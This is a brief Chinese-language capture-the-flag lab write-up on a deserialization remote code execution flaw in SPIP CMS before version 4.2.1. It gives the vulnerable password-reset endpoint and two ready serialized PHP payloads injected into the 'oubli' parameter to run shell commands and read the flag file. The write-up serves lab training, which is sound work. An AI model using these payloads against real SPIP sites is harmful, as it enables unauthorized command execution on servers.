适用版本
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞。
漏洞所在地
/spip.php?page=spip_pass&lang=fr
正文
首先我们进入到靶场后,点击此处进入到登录界面
再点击此处进入到修改密码的界面
抓包
然后随便填写一个邮箱格式进行抓包。
抓完包后在参数oubli的地方进行反序列化绕过。
修改参数
修改参数内容为s:24:"<?php+system('ls+/');+?>";"发现找到flag
找flag
再输入s:29:"<?php+system('cat+/flag');+?>";"就可以找到flag值了。